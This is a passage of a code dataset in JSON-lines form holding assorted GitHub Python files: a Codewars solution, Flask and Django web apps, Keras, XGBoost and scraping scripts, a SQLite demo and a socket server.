If not, see http://www.gnu.org/licenses/\r\n# -----------------------------------------------------------","repo_name":"HungryVovka/Codewars-Python","sub_path":"4 kyu/Twice linear.py","file_name":"Twice linear.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31336989034","text":"import os\nx = 10\nprint('blz?')\nretorno = os.fork()\n\nif retorno == 0:\n print('Sou o filho com pid', os.getpid(), x)\nelse:\n os.wait()\n print('Sou o pai', os.getpid(), 'Criei o filho', retorno)\n\n","repo_name":"gabrielmacaubas/IFPB","sub_path":"SO/semana-04/pai-filho.py","file_name":"pai-filho.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36114361945","text":"from flask import render_template, redirect, url_for, request, flash, Markup, session\nfrom wtforms.validators import ValidationError\nfrom cardiology.models import Doctors, Patients, Appointments, Medical_records, p_Messages, Scans, Prescription, \\\n examin\nfrom cardiology.forms import editPatientForm\nfrom cardiology import app, db\nfrom datetime import datetime, timedelta\nfrom cardiology.my_functions import any_name, parse_time, generate_gcalendar_link, availabe_appointments, save_picture, \\\n sorting_appointments, parse_time2\nfrom flask_login import current_user, login_required\n\n# ---------------------------------\np_user = current_user\ndoctors = Doctors.query.all()\n\n\n# ---------------------------------\n\n\n@app.route('/PatientProfile', methods=['GET', 'POST'])\n@login_required\ndef p_profile():\n # For the dynamic navbar\n if session[\"role\"] == \"Patient\":\n # For the dynamic navbar\n sidebar_active = 'p_profile'\n MR = Medical_records.query.filter_by(p_id=current_user.p_id).first()\n PRs = Prescription.query.filter_by(p_id=current_user.p_id).all()\n appoints = Appointments.query.filter_by(p_id=current_user.p_id).all()\n appoints = sorting_appointments(appoints, 'patient')\n PRs.reverse()\n d_obj = any_name(PRs, 'doctor')\n if request.method == 'POST':\n pic_path = save_picture(request.files['myfile'], 'profile_pics')\n current_user.p_photo = pic_path\n db.session.commit()\n return redirect(url_for('p_profile'))\n return render_template('patient_profile.html', user=current_user, MR=MR, PRs=PRs, appoints=appoints,\n active=sidebar_active, d_obj=d_obj)\n else:\n render_template('page403.html')\n\n\n@app.route('/BookAppointment', methods=['GET', 'POST'])\n@login_required\ndef book_appointment():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n global day\n # For the dynamic navbar\n sidebar_active = 'book_appointment'\n doctors = Doctors.query.all()\n if request.method == 'POST':\n session['doc_id'] = request.form['doctors']\n session['day'] = request.form['date']\n\n return redirect(url_for('doc_appointments'))\n\n return render_template('Booking.html', user=current_user, doctors=doctors, active=sidebar_active)\n else:\n render_template('page403.html')\n\n\n@app.route('/AvailableAppointment', methods=['GET', 'POST'])\n@login_required\ndef doc_appointments():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n # For the dynamic navbar\n sidebar_active = 'book_appointment'\n doc = Doctors.query.filter_by(d_id=session['doc_id']).first()\n if request.method == 'POST':\n hour = request.form['Time']\n p_date, p_time = parse_time(session['day'], hour)\n appoint = 
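A quick sanity check for `dbl_linear` above (illustrative; reuses the function exactly as defined):

# First twelve terms of u, matching the docstring example (u(10) == 22).
assert dbl_linear(0) == 1
assert dbl_linear(10) == 22
print([dbl_linear(n) for n in range(12)])
# -> [1, 3, 4, 7, 9, 10, 13, 15, 19, 21, 22, 27]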
Appointments(p_id=current_user.p_id,\n d_id=doc.d_id, date=p_date, Time=p_time)\n db.session.add(appoint)\n db.session.commit()\n google_calendar = generate_gcalendar_link(\n f\"Appointment with dr {Doctors.query.filter_by(d_id=session['doc_id']).first().d_name} at cardiology department\",\n \"\", parse_time2(session['day'], hour),\n parse_time2(session['day'], hour) + timedelta(minutes=30))\n flash(Markup(\n f'A new appointment is created, save the appointment to your calendar'),\n 'success')\n\n if examin.query.filter_by(d_id=doc.d_id, p_id=current_user.p_id).all() == []:\n pat = examin(d_id=doc.d_id, p_id=current_user.p_id)\n db.session.add(pat)\n db.session.commit()\n return redirect(url_for('book_appointment'))\n\n available_time = availabe_appointments(doc, session['day'])\n return render_template('book2.html', user=current_user, time=available_time, active=sidebar_active)\n else:\n render_template('page403.html')\n\n\n@app.route('/contact', methods=['POST', 'GET'])\n@login_required\ndef contact_page():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n # For the dynamic navbar\n sidebar_active = 'contact_page'\n doctors = Doctors.query.all()\n if request.method == 'POST':\n _text = request.form['Message']\n session['doc_id'] = request.form['doctor']\n message1 = p_Messages(p_id=p_user.p_id, d_id=Doctors.query.filter_by(d_id=session['doc_id']).first().d_id,\n message=_text, msg_date=datetime.now())\n db.session.add(message1)\n db.session.commit()\n flash('Message is sent successfully')\n else:\n render_template('page403.html')\n\n return render_template('contact.html', user=p_user, doctors=doctors, active=sidebar_active)\n\n\n@app.route('/scans', methods=['POST', 'GET'])\n@login_required\ndef scans_page():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n # For the dynamic navbar\n sidebar_active = 'scans_page'\n i = 1\n if request.method == 'POST':\n scan_path = save_picture(request.files['myfile'], 'scans')\n scan = Scans(p_id=p_user.p_id, scan_path=scan_path, scan_date=datetime.now())\n db.session.add(scan)\n db.session.commit()\n flash('Your scan is uploaded')\n\n patient_scans = Scans.query.filter_by(p_id=p_user.p_id).all()\n return render_template('scans.html', user=p_user, scans=patient_scans, i=i, active=sidebar_active)\n else:\n render_template('page403.html')\n\n\n@app.route('/EditPatientProfile', methods=['POST', 'GET'])\n@login_required\ndef edit_patient():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n form = editPatientForm()\n if form.validate_on_submit():\n current_user.p_email = form.email.data\n current_user.password = form.password.data\n current_user.p_username = form.username.data\n current_user.p_phone = form.phone.data\n db.session.commit()\n flash(f'patient {current_user.p_name} account is updated', category='success')\n return redirect(url_for('p_profile'))\n if form.errors != {}: # If there are not errors from the validations\n for err_msg in form.errors.values():\n flash(f'There was an error with editing the admin: {err_msg}', category='danger')\n return render_template('edit_patient.html', user=current_user, form=form)\n else:\n render_template('page403.html')\n","repo_name":"mahmoud1yaser/Amicus","sub_path":"cardiology/patient.py","file_name":"patient.py","file_ext":"py","file_size_in_byte":6741,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8806450188","text":"from numpy import array\r\nfrom 
keras.preprocessing.text import one_hot\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.layers.embeddings import Embedding\r\n# define documents\r\ndocs = ['Well done!',\r\n\t\t'Good work',\r\n\t\t'Great effort',\r\n\t\t'nice work',\r\n\t\t'Excellent!',\r\n\t\t'Weak',\r\n\t\t'Poor effort!',\r\n\t\t'not good',\r\n\t\t'poor work',\r\n\t\t'Could have done better.']\r\n# define class labels\r\nlbls = array([1,1,1,1,1,0,0,0,0,0])\r\n# integer encode the documents\r\nvs = 50\r\nenc_docs = [one_hot(d, vs) for d in docs]\r\nprint(enc_docs)\r\n# pad documents to a max length of 4 words\r\nmax_length = 4\r\np_docs = pad_sequences(enc_docs, maxlen=max_length, padding='post')\r\nprint(p_docs)\r\n# define the model\r\nmodelEmb = Sequential()\r\nmodelEmb.add(Embedding(vs, 8, input_length=max_length))\r\nmodelEmb.add(Flatten())\r\nmodelEmb.add(Dense(1, activation='sigmoid'))\r\n# compile the model\r\nmodelEmb.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])\r\n# summarize the model\r\nprint(modelEmb.summary())\r\n# fit the model\r\nmodelEmb.fit(p_docs, lbls, epochs=150, verbose=0)\r\n# evaluate the model\r\nloss, accuracy = modelEmb.evaluate(p_docs, lbls, verbose=2)\r\nprint('Accuracy: %f' % (accuracy*100))","repo_name":"fgafarov/learn-neural-networks","sub_path":"word_embed.py","file_name":"word_embed.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31178521204","text":"import numpy as np\nimport numpy.ma as ma\nimport pandas as pd\nimport os\nimport gc\nfrom tqdm import tqdm\n\nfrom utils.imagegen import *\nfrom utils.models import *\nfrom utils.loaderjpg import *\nfrom utils.generator import *\nfrom utils.augmentation import *\n\n# supports 3 channels JPG only. Use predictor.py for 4+ channels.\n\ndef make_submission(model, thresholds, rescale_dim, labels, sample_submission_filepath, real_submission_filepath, generator):\n\tdf_submission = pd.read_csv(sample_submission_filepath)\n\ttest_set = load_test_set(df_submission, rescale_dim)\n\tnumber_of_samples = df_submission.shape[0]\n\tprobability_prediction_filepath = real_submission_filepath + '.h5'\n\tpredict_df = prediction_dataframe(model, thresholds, labels, test_set, generator, probability_prediction_filepath);\n\tsubmit_df = submission_dataframe(df_submission, predict_df)\n\tsubmit_df.to_csv(real_submission_filepath, index=False)\n\tprint('submission file generated: {}'.format(real_submission_filepath))\n\ndef prediction_dataframe(model, thresholds, labels, test_set, generator, probability_prediction_filepath):\n\t# batch_size is limited by amount of RAM in computer and RAM in GPU. 
Set smaller batch size for bigger models like ResNet50 and VGG19.\n\tbatch_size = 16 #64\n\tprobability_prediction = predict_probabilities(test_set, model, batch_size, generator)\n\t# backup the probabilities for easy result ensembling\n\tnp.save(probability_prediction_filepath, probability_prediction)\n\ttest_prediction = predict_binary(probability_prediction, thresholds)\n\tresult_df = pd.DataFrame(test_prediction, columns = labels)\n\treturn result_df\n\ndef submission_dataframe(df_submission, result_dataframe):\n\t\"\"\"Turn a sample submission dataframe into a real prediction result submission dataframe\"\"\"\n\tpreds = []\n\tfor i in tqdm(range(result_dataframe.shape[0]), miniters=1000):\n\t\ta = result_dataframe.ix[[i]]\n\t\ta = a.transpose()\n\t\ta = a.loc[a[i] == 1]\n\t\t' '.join(list(a.index))\n\t\tpreds.append(' '.join(list(a.index)))\n\tdf_submission['tags'] = preds\n\treturn df_submission\n\ndef predict_binary(probability_predict, thresholds):\n\t\"\"\"Turn probabilites into 1's and 0's (binary) \"\"\"\n\ty_testset_predictions = (np.array(probability_predict) > thresholds).astype(int)\n\treturn y_testset_predictions\n\ndef predict_probabilities(test_set, model, batch_size, generator):\n\t\"\"\"\n\t\tTest Time Augmentation applied. +0.0008 in F2 score.\n\t\tbatch_size: Predict in small batches to fit within limited GPU memory\n\t\"\"\"\n\t#print(test_subset.shape)\n\ttestset_generator_1 = generator.testGen(test_set, batch_size)\n\ttestset_predict_1 = model.predict_generator(testset_generator_1, test_set.shape[0])\n\n\ttestset_generator_2 = generator.testGen(test_set, batch_size, tta_func=apply_tta_fliplr)\n\ttestset_predict_2 = model.predict_generator(testset_generator_2, test_set.shape[0])\n\n\ttestset_generator_3 = generator.testGen(test_set, batch_size, tta_func=apply_tta_flipud)\n\ttestset_predict_3 = model.predict_generator(testset_generator_3, test_set.shape[0])\n\n\ttestset_generator_4 = generator.testGen(test_set, batch_size, tta_func=apply_tta_flipboth)\n\ttestset_predict_4 = model.predict_generator(testset_generator_4, test_set.shape[0])\n\n\ttestset_predict = np.mean([testset_predict_1, testset_predict_2, testset_predict_3, testset_predict_4], axis=0)\n\n\treturn testset_predict","repo_name":"jackkwok/satellite-imagery-keras-deep-learning","sub_path":"utils/predictorjpg.py","file_name":"predictorjpg.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"31131179828","text":"# Declare Dependencies \nfrom bs4 import BeautifulSoup as bs\nfrom splinter import Browser\nimport pandas as pd\n\n\n# Choose the executable path to driver, for Windows specifically; from activity 12-01-05\nexecutable_path = {\"executable_path\": \"../../MyForkOfRepo/chromedriver.exe\"}\nbrowser = Browser(\"chrome\", **executable_path, headless=False)\n\n\n# NASA Mars News\n\n# Visit NASA news url through splinter module; activity 12-01-01, 02, 03, 05, 07\nurl = \"https://mars.nasa.gov/news/\"\nbrowser.visit(url)\n\n# HTML object\nhtml = browser.html\n\n# use bs to write to html\nsoup = bs(html, \"html.parser\")\n\n\n# inspect mars.nasa.gov to determine class text for title and paragraph;\n# retrieve latest element that contains news title and news paragraph; activity 12-01-04, 05\nnews_title = soup.find(\"div\", class_=\"content_title\").text\nnews_p = soup.find(\"div\", class_=\"article_teaser_body\").text\n\n# Display scrapped info \nprint(news_title)\nprint(news_p)\n\n\n# JPL Mars Space Images 
- Featured Image\n\n# Visit Mars Space Images through splinter module\nmars_image_url = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\nbrowser.visit(mars_image_url)\n\n# HTML Object \nhtml_image = browser.html\n\n# Parse HTML with Beautiful Soup\nsoup = bs(html_image, \"html.parser\")\n\n# Retrieve background image url from style tag \nfeatured_image_url = soup.find(\"article\")[\"style\"].replace(\"background-image: url(\",\"\").replace(\");\", \"\")[1:-1]\n\n# Website Url \nmain_url = \"https://www.jpl.nasa.gov\"\n\n# Concatenate website url with scrapped route\nfeatured_image_url = main_url + featured_image_url\n\n# Display full link to featured image\nfeatured_image_url\n\n\n# Mars Facts\n\n# Visit Mars facts url; using activity 12-01-07\nfacts_url = \"http://space-facts.com/mars/\"\n\n# Use Pandas to read/parse the url\nmars_facts = pd.read_html(facts_url)\n\n# take mars_facts DataFrame and assign to mars_df\nmars_df = mars_facts[0]\n\n# Assign columns\nmars_df.columns = [\"Title\",\"Info\"]\n\n# Set the index to the `Title` column\nmars_df.set_index(\"Title\", inplace=True)\n# mars_df\n\n# Save html code\nmars_df.to_html()\n\n\n# Mars Hemispheres\n\n# Visit hemispheres website through splinter module \nhemispheres_url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\nbrowser.visit(hemispheres_url)\n\nhtml_hemispheres = browser.html\n\n# Parse HTML with Beautiful Soup\nsoup = bs(html_hemispheres, \"html.parser\")\n\n# Retreive all items that contain mars hemispheres information\nitems = soup.find_all(\"div\", class_=\"item\")\n\n# Create empty list for hemisphere urls \nhemisphere_image_urls = []\n\n# Store the main_ul \nhemispheres_main_url = \"https://astrogeology.usgs.gov\"\n\n# Loop through the items previously stored\nfor i in items: \n # Store title\n title = i.find(\"h3\").text\n \n # Store link that leads to full image website; use inspect web page for class\n partial_img_url = i.find(\"a\", class_=\"itemLink product-item\")[\"href\"]\n \n # Visit the link that contains the full image website \n browser.visit(hemispheres_main_url + partial_img_url)\n \n # HTML Object of individual hemisphere information \n partial_img_html = browser.html\n \n # Parse HTML with Beautiful Soup for each hemisphere \n soup = bs(partial_img_html, \"html.parser\")\n \n # Retrieve full image source; click thumbnail, inspect page for class\n img_url = hemispheres_main_url + soup.find(\"img\", class_=\"wide-image\")[\"src\"]\n \n # Append the retreived information into a list of dictionaries \n hemisphere_image_urls.append({\"title\" : title, \"img_url\" : img_url})\n \n\n# Display hemisphere_image_urls\nhemisphere_image_urls","repo_name":"kristyski/web-scraping-challenge","sub_path":"Missions_to_Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31963395955","text":"# -*- coding: utf-8 -*-\n\"\"\"Forms for Django-Dag Models\"\"\"\n\nfrom django import forms\nfrom django.db.models import Count\nfrom django.core.exceptions import ValidationError\nfrom django.forms.models import ErrorList\nfrom django.utils.html import escape\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy as _\nfrom django_dag_admin.utils import get_nodedepth\n\n\nclass BaseDagMoveForm(forms.ModelForm):\n @staticmethod\n def mk_indent(level):\n return '    ' * (level - 1)\n\n 
@classmethod\n def add_subtree(cls, for_node, node, options):\n \"\"\"Recursively build options tree.\"\"\"\n try:\n if for_node:\n node._meta.model.circular_checker(node, for_node)\n except ValidationError:\n # Catch ValidationError ie The object is an ancestor or it's self\n pass\n else:\n options.append(\n (node.pk,\n mark_safe(cls.mk_indent(get_nodedepth(node)) + escape(node))))\n for subnode in node.children.all():\n cls.add_subtree(for_node, subnode, options)\n\n @classmethod\n def mk_dropdown_tree(cls, model, for_node=None, for_edge=None):\n \"\"\"Creates a tree-like list of choices\"\"\"\n options = [(0, _('-- root --'))]\n\n if for_node is None and for_edge:\n for_node = for_edge.child\n\n for node in model.objects.annotate(\n Count('parents')\n ).filter(parents__count=0):\n cls.add_subtree(for_node, node, options)\n return options\n\n\nclass MoveEdgeForm(BaseDagMoveForm):\n def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,\n initial=None, error_class=ErrorList, label_suffix=':',\n empty_permitted=False, instance=None,\n parent_object=None,\n **kwargs):\n\n opts = self._meta\n if opts.model is None:\n raise ValueError('ModelForm has no model class specified')\n\n choices = None\n if choices is not None:\n lct = dict(self.base_fields['parent'].limit_choices_to)\n lct.update({'pk__in': [cc[0] for cc in choices]})\n self.base_fields['parent'].limit_choices_to = lct\n\n super().__init__(\n data=data, files=files, auto_id=auto_id, prefix=prefix,\n initial=initial, error_class=error_class,\n label_suffix=label_suffix, empty_permitted=empty_permitted,\n instance=instance, **kwargs)\n\n def clean(self):\n cleaned_data = super().clean()\n parent = cleaned_data.get('parent')\n if parent is None:\n return cleaned_data\n try:\n child = cleaned_data['id'].child\n except AttributeError:\n return cleaned_data\n nodeModel = child._meta.model\n try:\n nodeModel._meta.model.circular_checker(parent, child)\n except ValidationError as err:\n self.add_error('parent', err)\n return cleaned_data\n\n\nclass MoveNodeForm(BaseDagMoveForm):\n pass\n","repo_name":"bva-icx/django-dag-admin","sub_path":"src/django_dag_admin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25262194315","text":"from threading import Thread, Lock, Event\nimport socket\nimport time\n\nfrom lru import LRU\n\nclass SocketCommunicator():\n def __init__(self, maxUnacceptConnections=5):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = ('', 10000)\n self.sock.bind(server_address)\n self.sock.listen(maxUnacceptConnections)\n\n self.theData = []\n self.theDataLock = Lock()\n self.shutdown_event = Event()\n self.theThread = None\n\n self.connections = LRU(10)\n\n def startServer(self):\n if self.theThread is not None:\n return\n def start():\n while not self.shutdown_event.is_set():\n print('waiting for connection...')\n connection, client_address = self.sock.accept()\n print('accepted connection from: {}'.format(client_address))\n data = connection.recv(1)\n if data:\n data = data.decode()\n print(data)\n print()\n if self.connections.get(client_address) is None:\n self.connections[client_address] = data\n with self.theDataLock:\n self.theData.append(data)\n self.sock.close()\n servThread = Thread(target=start, daemon=True)\n servThread.start()\n self.theThread = servThread\n\n def sendMessage(self, addr, port, data):\n connection = 
socket.create_connection((addr, port))\n connection.sendall(data)\n connection.close()\n\n def stop(self):\n self.shutdown_event.set()\n if self.theThread is not None:\n self.theThread.join()\n\n def getTheData(self):\n with self.theDataLock:\n tmp = self.theData.copy()\n self.theData = []\n return tmp\n \n def whoSent(self, data):\n items = self.connections.items()\n for addr, msg in items:\n if msg==data:\n return addr\n return None\n\n \n\n","repo_name":"jaredwillard12/serverclient","sub_path":"serverclient/serverAndClient.py","file_name":"serverAndClient.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15385767926","text":"import pandas as pd\nfrom xgboost import XGBRegressor\nimport pickle\nimport numpy as np\n\nwith open('utils/feature_changes','rb') as f:\n feature_changes=pickle.load(f)\nwith open(\"utils/encoders.pkl\",'rb') as f:\n encoders=pickle.load(f)\nwith open(\"utils/total_columns.pkl\",'rb') as f:\n total_columns=pickle.load(f)\nwith open('utils/model_params.json','rb') as f:\n model_params=pickle.load(f)\nxgb1=XGBRegressor(**model_params)\nxgb1.load_model('utils/xgboost_0')\nxgb2=XGBRegressor(**model_params)\nxgb2.load_model('utils/xgboost_1')\nxgb3=XGBRegressor(**model_params)\nxgb3.load_model('utils/xgboost_2')\nxgb4=XGBRegressor(**model_params)\nxgb4.load_model('utils/xgboost_3')\nxgb5=XGBRegressor(**model_params)\nxgb5.load_model('utils/xgboost_4')\n\n\ndef fill_cloud(site):\n if str(feature_changes['fill_null/weather/cloud_coverage'][site])=='nan':\n return feature_changes['fill_null/weather/cloud_coverage_cloud_fill_nan']\n else:\n return feature_changes['fill_null/weather/cloud_coverage'][site]\ndef fill_precip(site):\n if str(feature_changes['fill_null/weather/precip_depth_1_hr'][site])=='nan':\n return feature_changes['fill_null/weather/precip_depth_1_hr_precip_fill_nan']\n else:\n return feature_changes['fill_null/weather/precip_depth_1_hr'][site]\n\ndef get_preprocessed(data):\n df=pd.DataFrame(data,index=[0])\n df['air_temperature'].fillna(value=feature_changes['fill_null/weather/air_temperature'],inplace=True)\n df['sea_level_pressure'].fillna(value=feature_changes['fill_null/weather/sea_level_pressure'],inplace=True)\n df['wind_speed'].fillna(value=feature_changes['fill_null/weather/wind_speed'],inplace=True)\n df['dew_temperature'].fillna(value=feature_changes['fill_null/weather/dew_temperature'],inplace=True)\n df['wind_direction'].fillna(value=feature_changes['fill_null/weather/wind_direction'],inplace=True)\n df.loc[df['floor_count'].isnull()==True,'floor_count']=df.loc[df['floor_count'].isnull()==True,'primary_use'].map(feature_changes['fill_null/build/floor_count'])\n df.loc[df['cloud_coverage'].isnull()==True,'cloud_coverage']=df.loc[df['cloud_coverage'].isnull()==True,'site_id'].apply(fill_cloud)\n df.loc[df['precip_depth_1_hr'].isnull()==True,'precip_depth_1_hr']=df.loc[df['precip_depth_1_hr'].isnull()==True,'site_id'].apply(fill_precip)\n for col,encoder in encoders.items():\n df[col]=encoder.transform(df[col])\n return df\n\ndef get_model_prediction(data):\n data=data[total_columns].values\n p1=np.expm1(xgb1.predict(data))\n p2=np.expm1(xgb2.predict(data))\n p3=np.expm1(xgb3.predict(data))\n p4=np.expm1(xgb4.predict(data))\n p5=np.expm1(xgb5.predict(data))\n p=(p1+p2+p3+p4+p5)/5.0\n return float(p)\n 
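An illustrative usage sketch for the `SocketCommunicator` class above (assumes the class is in scope; note the server reads exactly one byte per connection via recv(1)):

import time

comm = SocketCommunicator()
comm.startServer()                          # daemon accept loop on port 10000
comm.sendMessage("127.0.0.1", 10000, b"A")  # a single byte, matching recv(1)
time.sleep(0.5)                             # give the server thread a moment
print(comm.getTheData())                    # expected: ['A']
print(comm.whoSent("A"))                    # (addr, port) of the sender
# The accept loop is a daemon thread, so it ends when the process exits.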
","repo_name":"RavitejaBadugu/ashare","sub_path":"deployment/fastapi/predictive_functions.py","file_name":"predictive_functions.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34074938291","text":"import sqlite3\n\ncon = sqlite3.connect(\"library.db\")\ncur = con.cursor()\n\ntry:\n cur.execute(\"CREATE TABLE Book(title, author, year)\")\n print(\"Tabella Book creata con successo.\")\nexcept:\n print(\"Non creo la tabella perché esite già.\")\n\ncur.execute(\"\"\"INSERT INTO Book VALUES\n ('Il Signore degli Anelli', 'Tolkien', 1954),\n ('2000 Leghe Sotto i Mari', 'Verne', 1850)\n\"\"\")\ncon.commit()\nprint(\"Query INSERT eseguita correttamente.\")\n\n\nres = cur.execute(\"\"\"SELECT * FROM Book\"\"\")\n\nbooks = res.fetchall()\n\nfor book in books:\n print(book)\n # print(book[0])\n # print(book[1])\n # print(book[2])\n","repo_name":"ecamellini/python-exercises","sub_path":"database-sqlite/example-db.py","file_name":"example-db.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39099309598","text":"from sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\n\ndf=pd.read_excel(r\"Datasets\\Excel.xlsx\")\nprint(df)\n\nscalar=MinMaxScaler()\n\ndf[[\"Salary\", \"Age\"]]=scalar.fit_transform(df[[\"Salary\", \"Age\"]])\nprint(df)\n","repo_name":"vicwei8128/Python_practise","sub_path":"Python_Demo/DataPreProcessing/DataPreProcessing/ScaleDataFrame.py","file_name":"ScaleDataFrame.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41323393457","text":"from django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.db.models import Q\nfrom .models import personnel as T_Personnel\nfrom .models import personcertif as T_PersonnelCertificate\nfrom group.models import group\nfrom team.models import team\nfrom basedata.models import base\nfrom devinterfacesrv.models import interfacesrvdata\nfrom appkey.models import appkey\nfrom common.views import *\nfrom django.http import JsonResponse\nfrom .forms import *\nfrom group.forms import GroupModelForm\nfrom organize.models import organize\nimport json\nfrom django.utils import timezone\nfrom django.forms import widgets as Fwidge\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Create your views here.\n#班组管理控制器入口\ndef personnel(request):\n prj_id = request.session['PrjID']\n\n team_info = team.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=prj_id))\n teaminfo = get_dict_table(team_info, 'FID', 'FName')\n\n worktype_info = base.objects.filter(Q(FPID='2137f046a6a711e9b7367831c1d24216'))\n worktypeinfo = get_dict_table(worktype_info, 'FID', 'FBase')\n\n group_info = group.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=prj_id))\n groupinfo = get_dict_table(group_info, 'FID', 'FGroup')\n\n return render(request, 'content/personnel/personnelinfo.html', locals())\n\n\n#返回table数据及查询结果\ndef get_datasource(request):\n serinput = request.POST.get(\"resultdict[FName]\", '')\n\n prj_id = request.session['PrjID']\n\n Person_info = T_Personnel.objects.filter(Q(FName__contains=serinput), Q(CREATED_PRJ=prj_id))\n #Person_info = org_split(Person_info, request)\n\n dict = convert_to_dicts(Person_info)\n resultdict = {'code':0, 'msg':\"\", 'count': Person_info.count(), 'data': 
dict}\n\n return JsonResponse(resultdict, safe=False)\n\n\n#刷新下拉列表框数据\ndef ref_dropdowndata(obj, request):\n team_info = team.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=request.session['PrjID']))\n worktype_info = base.objects.filter(Q(FPID='2137f046a6a711e9b7367831c1d24216'))\n\n obj.fields['FTeamID'].choices = get_dict_object(request, team_info, 'FID', 'FName')\n obj.fields['FWorktypeID'].choices = get_dict_object(request, worktype_info, 'FID', 'FBase')\n\n#链接增加模板\ndef add(request):\n if request.method == 'GET':\n fgroupid = ''.join(str(request.GET.get('fid')).split('-'))\n\n obj = PersonModelForm()\n\n group_info = group.objects.get(Q(FID=fgroupid))\n GroupForm = GroupModelForm(instance=group_info)\n\n team_info = team.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=request.session['PrjID']))\n GroupForm.fields['FTeamID'].choices = get_dict_object(request, team_info, 'FID', 'FName')\n\n worktype_info = base.objects.filter(Q(FPID='2137f046a6a711e9b7367831c1d24216'))\n GroupForm.fields['FWorktypeID'].choices = get_dict_object(request, worktype_info, 'FID', 'FBase')\n\n certif_info = base.objects.filter(Q(FPID='691fd5e2a90711e9866b7831c1d24216'))\n certifinfo = get_dict_table(certif_info, 'FID', 'FBase')\n\n ref_dropdowndata(obj, request)\n return render(request, \"content/personnel/personneladd.html\" , {'obj': obj, 'GroupForm': GroupForm, 'fgroupid': fgroupid, 'certifinfo':certifinfo, 'action': 'insert'})\n\n\n#链接编辑模板\ndef edit(request):\n fid = request.GET.get('fid')\n\n Person_info = T_Personnel.objects.get(Q(FID=fid))\n fgroupid = Person_info.FGroupID\n obj = PersonModelForm(instance=Person_info)\n\n try:\n group_info = group.objects.get(Q(FID=fgroupid))\n GroupForm = GroupModelForm(instance=group_info)\n\n\n team_info = team.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=request.session['PrjID']))\n GroupForm.fields['FTeamID'].choices = get_dict_object(request, team_info, 'FID', 'FName')\n\n worktype_info = base.objects.filter(Q(FPID='2137f046a6a711e9b7367831c1d24216'))\n GroupForm.fields['FWorktypeID'].choices = get_dict_object(request, worktype_info, 'FID', 'FBase')\n\n certif_info = base.objects.filter(Q(FPID='691fd5e2a90711e9866b7831c1d24216'))\n certifinfo = get_dict_table(certif_info, 'FID', 'FBase')\n\n photo_path = Person_info.FPhoto\n\n ref_dropdowndata(obj, request)\n\n return render(request, \"content/personnel/personneladd.html\", {'obj': obj, 'fgroupid': fgroupid, 'GroupForm': GroupForm, 'certifinfo': certifinfo, 'photopath': photo_path, 'action': 'update'})\n\n except ObjectDoesNotExist:\n return render(request, \"content/personnel/personneladd.html\", {'obj': obj, 'fgroupid': fgroupid, 'action': 'update'})\n\n\n#处理新增及保存\ndef insert(request):\n if request.method == 'POST':\n response_data = {}\n\n fgroupid = request.GET.get('fgroupid')\n\n if request.GET.get('actype') == 'insert':\n obj = PersonModelForm(request.POST)\n elif request.GET.get('actype') == 'update':\n fid = request.POST.get('FID')\n Person_info = T_Personnel.objects.get(FID=fid)\n obj = PersonModelForm(request.POST, instance=Person_info)\n else:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n #ref_dropdowndata(obj, request)\n\n try:\n if obj.is_valid():\n temp = obj.save(commit=False)\n if request.GET.get('actype') == 'insert':\n temp.FStatus = 0\n temp.FGroupID = fgroupid\n temp.FTeamID = request.POST.get('FTeamID')\n temp.FWorktypeID = request.POST.get('FWorktypeID')\n temp.CREATED_PRJ = request.session['PrjID']\n temp.CREATED_ORG = request.session['UserOrg']\n 
